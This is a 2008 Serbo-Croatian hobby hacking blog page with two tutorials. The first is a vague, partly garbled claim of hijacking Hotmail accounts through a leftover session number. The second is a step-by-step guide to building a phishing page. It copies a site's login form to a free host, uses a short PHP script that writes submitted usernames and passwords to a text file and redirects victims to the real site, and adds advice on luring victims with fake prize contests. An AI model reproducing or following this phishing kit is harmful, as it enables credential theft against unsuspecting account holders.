evo nesto o hakovanju hotmaila

03.10.2008 04:00

evo nekih zanimljivosti za hakovanje hotmaila....

 

 

HOTMAIL ACC

Prvo sto moramo znati ako zelimo uci na neciji acc na hotmail-u je njegov login. Dakle to ide nekako ovako ako je mu je e-mail adressa zrtva@hotmail.com onda mu je login zrtva

(koja logika a?). Uvijek pazite da upisete pravilan login jer hotmail loguje IP ako je login pogresan. I sta onda? Onda ovako:

E sad je vreme da pogledamo source code od passwdord stranice na kojoj smo. Pisace

www.hotmail.com/cgi-bin/password.cgi u URL box-u. E i onda malo pogledajte source cod ove stranice (desni klik pa view source) i potrazite liniju u kojoj pise

Top of Form

Ovo je vrlo vazna linija, ali pre nego sto nastavimo dalje da objasnimo nesto.

Naime ova provala radi samo pod uslovom da korisnik kojem zelimo uci na acc nije napustio svoj acc na hotmail-u tako da je klikno na dugme logout ili exit. Jer poenta je u tome da hotmail nezna jel korisnik jos uvek logovan na svoj acc ako ovaj nije klikno exit, jer ako je user jednostavno pogledao svoj mail i onda u URL box upisao neku sasvim drugu adresu hotmail jos uvek misli da je on logovan na sistemu.

Dakle ovako

Nakon sto se nasa zrtva ulogovala na svoj acc na hotmail-u u URL box-u pisace mu

http://nekibroj/cgi-bin//start/username/nekibroj

I vidi vraga (i na njoj zvoncic) to je isti broj koji smo mi videli ranije u ovom textu u source codu. Posto smo dobili taj broj samo trebamo upisati taj broj u URL box, ne mozete ga koristti tako da ga upisete u file ->new!!! I nakon sto smo uneli URL pritisnemo enter i gledamo kako nam hotmail daje full acces.

 

kontakt

Zvuk{54ck3r}

ultrazvuk90@msn.com

pretraga

Evo jednog prostog nacina da nekome saznate msn passwore...

 

 

Evo jedan tutorial od mene za VAS BigSmile

Znaci kako napraviti phiser za bilo koji sajt.

________________________________________-
Uvod za pocetnike:

1.Sta je phiser?

Phiser je lazna login strana od nekog sajta.


2.Zasto sluzi phiser?

Kada se zrtva loginuje na vas fake login page njeni podaci idu direktno vama (na host na kome ste uploadovali phiser) .Zrtva po ukucavanju svojih podataka u phiser bude redirektovana na originalni sajt da nebi posumnjala i promenila podatke.

3. Kako "navuci" zrtvu da se loguje na vas fake login page?

Da bi nekog uvjerili da se loguje na vas "sajt" (phiser) morate da smislite dobru pricu.Meni uvjek pali kad spomenem neku nagradnu igru i da ce informacije stici na email po logovanju Smile.

______________________________________________________________
Pa da pocnemo :

Da bi napravili phiser potreban vam je host account na nekom sajtu.
Ja predlazem zyimic host jer su ljudi krajnje neozbiljni i neprovjeravaju sajtove koje ljudi prave na njihovom hostu(naravno besplatan host)

Code:

http://www.zymic.com/


Kada ste napravili account na nekom free hostu u ovom slucaju zumic hostu idite na sajt za koji hocete da napravite lazni login page.
Otvorite source code tog sajta (obicno desni klik ----> View Source)
.(Dabi bili sigurni da ste otovrili pravi source code na forumima morate biti odlogovani i probati da napisete poruku...Zatim ce da iskoci popup da niste logovani i prebacice vas na login page...Odatle otvorite source code).
Zatim kopirajte taj source kod.
Posle toga idite na vas host account u ovom slucaj zymichost i pritisnite "New File" koji cete nazvati

Code:

login.htm

  i u  njemu kliknite na "Paste" da bi prekopirali source kod i snimite.
Sad kreirajte jos jedan file koji cete nazvati phish.php i u njega prekopirajte sledeci kod

Code:


header 
('Location: http://yahoo.com ');

$handle fopen("passwords.txt""a");

foreach(
$_POST as $variable => $value) {

fwrite($handle$variable);

fwrite($handle"=");

fwrite($handle$value);

fwrite($handle"\r\n");

}

fwrite($handle"\r\n");

fclose($handle);

exit;

?>

yahoo.com je u ovom slucaju sajt na koji ce zrtva biti redirektovana...Taj deo koda mijenjate u zavisnosti od toga za koji sajt pravite phiser(ako pravite phiser za hotmail stavicete hotmail.com)
Sad se vratite na vas login.htm file i kliknite edit.
Pritisnite CTRL+F i ukucajte u search polje(opcija koja je nastala koriscenjem CTRL+F )  "action=" (bez navodnika) i pritiscite Find dok nedodjete do djela o logovanju...Obicno pise "action=login.php ...U svakom slucaju ce te prepoznati. i zamjenite deo iza action= sa phish.php i snimite.

_____________________________________________________________


Logovanjem zrtve ce se napraviti password.txt file u kome ce se nalaziti login podaci.

Cestitam...Napravili ste svoj phiser!!!

Jos vam preporucujem da koristite besplatni co.cc domen da bi sve to izgledalo uvjerljivije.



UZIVAJTE


Tutorial made by shegi for Zvuk{54ck3r}Bomba

 

© 2008 All rights reserved.

Create a website for freeWebnode